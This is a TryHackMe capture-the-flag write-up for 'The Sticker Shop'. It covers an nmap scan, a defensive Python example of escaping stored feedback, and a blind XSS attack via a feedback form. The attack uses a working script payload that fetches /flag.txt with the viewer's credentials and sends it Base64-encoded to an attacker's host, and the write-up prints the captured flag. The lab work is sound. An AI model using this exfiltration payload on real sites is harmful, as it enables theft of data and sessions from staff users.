The Sticker Shop Motion Graphics TryHackMe Writeup | Beginner Friendly | Detailed Walkthrough | SuNnY
Motion graphics writeup for the TryHackMe room → [ The Sticker Shop ]
Thanks to the Creators of this Room —
ROOM TYPE :
Difficulty → Easy
[ Name : The Sticker Room ]
This is a Free Room. Anyone can deploy virtual machines in the room
(without being subscribed)!
ROOM OBJECTIVES →
What is the content of flag.txt?
Let’s Fire Up the Machine 🔥
Saving the IP to the Hosts File
Let's begin by adding the machine's IP address to the hosts file
and giving it a domain name → thestickershop.thm (this can be anything)
echo "IP-OF-YOUR-MACHINE thestickershop.thm" | sudo tee -a /etc/hosts
Other way:
** You can use any text editor for this (vim, subl, etc.) →
sudo nano /etc/hosts
IP-ADDRESS-OF-YOUR-MACHINE thestickershop.thm
(Ctrl+X, then Y [yes] to save the file)
Don't forget to put your machine's IP address in place of
"IP-ADDRESS-OF-YOUR-MACHINE"
Initial Reconnaissance ( Nmap Scan )
nmap -sVC -T4 thestickershop.thm -oN nmapscan.txt
Nmap scan report for thestickershop.thm (IP Redacted)
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9
(Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| 256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
|_ 256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
8080/tcp open http-proxy Werkzeug/3.0.1 Python/3.8.10
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
|_http-title: Cat Sticker Shop
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.1 Python/3.8.10
| Date: << Redacted >>
| Content-Type: text/html; charset=utf-8
| Content-Length: 1655
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>Cat Sticker Shop</title>
| <style>
| body {
| font-family: Arial, sans-serif;
| margin: 0;
| padding: 0;
| header {
| background-color: #333;
| color: #fff;
| text-align: center;
| padding: 10px;
| header ul {
| list-style: none;
| padding: 0;
| header li {
| display: inline;
| margin-right: 20px;
| header a {
| text-decoration: none;
| color: #fff;
| font-weight: bold;
| .content {
| padding: 20px;
|_ .product {
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint
at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.53 seconds
Found two open ports →
Port 22/TCP SSH
and Port 8080/TCP HTTP
Let's check port 8080 →
http://thestickershop.thm:8080/
We see two images →
Cat Sticker 1
and Cat Sticker 2
on →
http://thestickershop.thm:8080/
After exploring the HTTP port, we find a Feedback Form →
The Submit Feedback page lets users provide comments via a feedback form with a textarea input field, which submits the data through a POST request to the /submit_feedback endpoint. Upon successful submission, users receive the confirmation message: "Thanks for your feedback! It will be evaluated shortly by our staff." Accepting user-supplied input that staff will later view introduces security risks, in particular stored (blind) Cross-Site Scripting (XSS): whatever a visitor submits is rendered in a staff member's browser. To mitigate this, the application should encode or escape the feedback at the point where it is rendered into HTML, validate input on both client and server sides, and enforce a Content Security Policy (CSP) that blocks inline and third-party scripts, so that user data is displayed as text rather than interpreted as markup.
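To make that mitigation concrete, here is an added Python example (my own construction, not the room's application code) showing a staff review page that renders stored feedback unsafely beside a hardened version that HTML-encodes each entry and sends a CSP; the feedback entry and the page template are constructed samples.

```python
import html

# Constructed sample feedback of the kind the form accepts: a script tag
# followed by ordinary text (the tag body is a placeholder, not a real payload).
SAMPLE_FEEDBACK = '<script>/* constructed sample */</script>Great stickers!'

# Constructed review-page template; {items} is filled with rendered entries.
PAGE = "<html><body><h1>Feedback queue</h1><ul>{items}</ul></body></html>"


def render_unsafe(entries):
    """Vulnerable pattern: stored feedback is concatenated straight into the
    staff review page, so a <script> submitted by a visitor runs in the
    reviewer's browser with the reviewer's session (stored / blind XSS)."""
    items = "".join(f"<li>{e}</li>" for e in entries)
    return PAGE.format(items=items)


def render_safe(entries):
    """Hardened pattern: HTML-encode every entry at render time. The text is
    stored verbatim; only its representation in the page changes, so
    '<script>' reaches the browser as '&lt;script&gt;' and is displayed,
    not executed."""
    items = "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries)
    return PAGE.format(items=items)


def security_headers():
    """Defence in depth for the review page: scripts only from the site's own
    origin (no inline scripts), and connect-src limited to 'self' so an
    injected fetch() to an outside host is refused by the browser even if
    encoding were missed somewhere. Assumes the site has no inline scripts."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "connect-src 'self'; object-src 'none'; "
                                   "base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_raw_script(page_html):
    """Does the rendered page still contain an un-encoded <script> tag?"""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    entries = [SAMPLE_FEEDBACK, "Love the cat stickers"]
    print("unsafe page has live <script>:", contains_raw_script(render_unsafe(entries)))
    print("safe page has live <script>:  ", contains_raw_script(render_safe(entries)))
    print(security_headers()["Content-Security-Policy"])
```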
Objective for the room is to find Flag Value From this Path →
http://thestickershop.thm:8080/flag.txt
We are going to start an HTTP server on port 8081 on our local machine →
We will write a JavaScript payload that reads the response of a fetch request to a path on the current origin (here /flag.txt) and exfiltrates it. The payload uses the btoa() function to encode the text content of the fetched response as Base64. The encoded data is then sent to our remote server at http://Your-IP(tun0)/ via a second fetch request. That second request specifies mode: 'no-cors', so the browser sends it to our cross-origin server without a CORS preflight (the response is opaque, but we only need the request to arrive). The first fetch includes the credentials: 'same-origin' directive so that cookies and other credentials of the viewing user are transmitted, which can expose sensitive information from the target application.
<script>
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})
.then(response => response.text())
.then(text => {
fetch('http://Your-tun0-IP:PortNumber/' + btoa(text), {mode:'no-cors'});
});
</script>
Replace Your-tun0-IP with your VM's IP (ifconfig → tun0) and replace PortNumber with the port of the HTTP server we are about to start.
Once the payload submitted through the Feedback Form is executed, a callback is made to our web server in the form of a GET request whose path carries the Base64-encoded string, confirming the connection and validating that the injection worked.
Here are the Full Steps shown using Motion Graphics →
We find a Base64 string in the GET request logged by our HTTP server →
/VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9
There are two ways to decode the Base64 string →
1. Decoding the string using the CLI →
echo "VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9" | base64 -d